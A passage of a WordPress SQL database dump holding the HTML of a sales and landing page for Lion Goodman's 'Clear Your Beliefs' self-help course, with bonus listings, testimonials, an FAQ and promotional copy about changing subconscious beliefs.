level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd">Purchase</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n//', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 19:15:13', '2014-12-12 00:15:13', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1983, 2, '2014-12-11 03:10:16', '2014-12-11 08:10:16', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left">The same thing is true in your subconscious mind:</p>\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n<p style="text-align: left"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At 